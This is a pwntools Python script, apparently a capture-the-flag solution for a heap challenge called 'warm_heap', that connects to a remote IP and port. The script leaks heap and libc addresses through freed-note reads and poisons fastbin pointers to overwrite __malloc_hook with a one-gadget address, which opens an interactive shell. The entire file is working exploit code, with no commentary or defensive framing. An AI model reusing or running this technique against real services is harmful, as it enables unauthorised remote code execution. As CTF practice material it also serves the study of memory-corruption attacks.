exploit.py

#!/usr/bin/python
from pwn import *

p = remote("35.227.33.93", 9999)
#p = process("./warm_heap",env={"LD_PRELOAD":"./libc.so.6"})

def menu():
	p.recvuntil(">>")

def add_note(idx,size,name):
	menu()
	p.sendline("1")
	p.recvuntil("index:")
	p.sendline(str(idx))
	p.recvuntil("size:")
	p.sendline(str(size))
	p.recvuntil("input")
	p.send(name)

def remove_note(idx):
	menu()
	p.sendline("3")
	p.recvuntil("index:")
	p.sendline(str(idx))

def edit_note(idx,new_i):
	menu()
	p.sendline("2")
	p.recvuntil("index:")
	p.sendline(str(idx))
	p.recvuntil("input")
	p.sendline(new_i)

def view(idx):
	menu()
	p.sendline("4")
	p.recvuntil("index:")
	p.sendline(str(idx))
	return p.recvuntil("1)").strip("1)")

lol = "A"*2
lol += "\n"

add_note(0,24,lol)
add_note(1,24,lol)

remove_note(0)
remove_note(1)

add_note(0,1,"A")

heap = view(0).strip("\n").strip("\x20")
heap = heap.ljust(0x8,"\x00")
heap = u64(heap) - 0x41
log.success("Heap: " + hex(heap))

remove_note(0)

add_note(0,200,"AA\n")
add_note(1,200,"AA\n")

remove_note(0)

add_note(0,8,"XXXXXXXX")
add_note(0,8,"XXXXXXXX")
add_note(0,8,"XXXXXXXX")

leak = view(0).strip("\n").strip("\x20").strip("XXXXXXXX")
leak += "\x00"*2
leak = u64(leak) - 0x3c4c38

log.success("Libc: " + hex(leak))

setup = p64(0x00)
setup += "F"*60 + "\n"
add_note(5,100,setup)

add_note(2,100,"AA\n")
add_note(3,100,"AA\n")
add_note(4,100,"aaaaaaaaaaaaaaaa\n")
add_note(-9,20,"bb\n")

# overflow into 3rd
#p.interactive()
remove_note(4)
buf = "P"*6*16
buf += p64(0x00)
buf += p64(0x71)
buf += p64(heap + 0x60)
buf += "\n"
edit_note(3,buf)

add_note(6,100,"AA\n")
add_note(6,100,"AA\n")

add_note(-10,20,"PPPP\n")
remove_note(3)

buf = "F"*6*16
buf += p64(0x00)
buf += p64(0x71)
buf += p64(leak + 0x3c4aed)
buf += "\n"
edit_note(2,buf)

magic = leak + 0xf1117

finale = "X"*19
finale += p64(magic)
finale += "\n"

add_note(7,100,finale)
add_note(7,100,finale)

remove_note(5)
remove_note(6)

p.interactive()